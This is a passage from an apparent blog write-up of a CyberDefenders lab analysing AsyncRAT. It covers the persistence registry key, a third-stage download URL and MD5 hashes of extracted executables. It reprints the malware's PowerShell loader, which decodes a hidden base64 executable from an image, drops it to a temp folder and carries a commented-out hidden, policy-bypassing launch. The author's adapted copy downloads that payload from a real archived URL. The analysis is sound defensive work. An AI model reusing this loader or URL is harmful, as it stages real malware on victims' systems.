    $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';
    $endFlag = '<<BASE64_END>>';
    $startIndex = $imageText.IndexOf($startFlag);
    $endIndex = $imageText.IndexOf($endFlag);
    $startIndex -ge 0 -and $endIndex -gt $startIndex;
    $startIndex += $startFlag.Length;
    $base64Length = $endIndex - $startIndex;
    $base64Command = $imageText.Substring($startIndex, $base64Length).ToCharArray();
    [array]::Reverse($base64Command);
    $base64Command=-join $base64Command;
    $commandBytes = [System.Convert]::FromBase64String($base64Command);
    $tempExePath = [System.IO.Path]::GetTempPath() + [System.Guid]::NewGuid().ToString() + ".exe";
    [System.IO.File]::WriteAllBytes($tempExePath, $commandBytes);
    #powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $tempExePath

    Afterwards, we can use $tempExePath to find the location of the executable file, and then we can use Get-FileHash in Powershell to get the MD5 hash of the file.

        PS C:\Users\Administrator\Desktop\Start here\Artifacts> Get-FileHash $tempExePath -Algorithm MD5

    Algorithm       Hash                                                                   Path
    ---------       ----                                                                   ----
    MD5             C1AA076CA869A7520CA2E003B7C02AB3                                       C:\Users\Administrator\AppDat...

  5. AsyncRAT seeks to embed itself within the system for long-term espionage. During your sweep, you stumble upon a registry key intended for persistence. Can you provide the full path of this registry key where the malware attempts to solidify its presence?

    Let's hook this up to dnSpy and look into the decompilation of the malware, to figure out what Registry Key it is modifying.

    alt text

    Looking at this source code, we can see that they seem to reverse most of the strings, possibly as an effort to evade Windows Defender or other AVs. Thankfully this code itself is not obfuscated, and we can find the registry key in the RegistryKey variable 😛, all we have to do now is reverse it. Plugging into CyberChef, we get SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run. This doesn't work for the answer tho, we need to look closely into the code and see that it's using Registry.CurrentUser.OpenSubkey, so we need to add a HKCU before the other keys.

  6. Your analysis doesn't stop at the second stage; the malware has more secrets to unveil. A third stage is downloaded from a URL you need to uncover. What is the URL from which the malware downloads the third stage?

    Just below this, and in the screenshot above, we can see a reversed URL, so after reversing it we can find https://web.archive.org/web/20240701132151if_/https://gcdnb.pbrd.co/images/L3GM1EngRrYs.png

  7. With the third stage of AsyncRAT now in focus, another Portable Executable (PE) comes to light. For a comprehensive understanding of this stage, what is the MD5 hash of the extracted PE from the third stage?

    Because the CyberDefenders VM has no access to the web, I need to use a VM for this step.

    I'm just gonna write a new "script" (not really a script ig, I'm just pasting this into a terminal) based on the old one.

        $imageUrl = 'https://web.archive.org/web/20240701132151if_/https://gcdnb.pbrd.co/images/L3GM1EngRrYs.png';
    $webClient = New-Object System.Net.WebClient;
    $imageBytes = $webClient.DownloadData($imageUrl);
    $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';
    $endFlag = '<<BASE64_END>>';
    $startIndex = $imageText.IndexOf($startFlag);
    $endIndex = $imageText.IndexOf($endFlag);
    $startIndex -ge 0 -and $endIndex -gt $startIndex;
    $startIndex += $startFlag.Length;
    $base64Length = $endIndex - $startIndex;
    $base64Command = $imageText.Substring($startIndex, $base64Length).ToCharArray();
    [array]::Reverse($base64Command);
    $base64Command=-join $base64Command;
    $commandBytes = [System.Convert]::FromBase64String($base64Command);
    $tempExePath = [System.IO.Path]::GetTempPath() + [System.Guid]::NewGuid().ToString() + ".exe";
    [System.IO.File]::WriteAllBytes($tempExePath, $commandBytes);
    #powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $tempExePath

    Afterwards, just got the hash from $tempExePath like before.

        PS C:\Users\flarevm > Get-FileHash $tempExePath -Algorithm MD5

    Algorithm       Hash                                                                   Path
    ---------       ----                                                                   ----
    MD5             3C63488040BB51090F2287418B3D157D                                       C:\Users\flarevm\AppData\Local\Temp\1e856cd7-7097-4c1b-8650-aa79e07b3adb.exe

This is all for now! Happy Hunting

Bernardo :)

Previous

CyberDefenders - GoldenSpray

Copyright 2026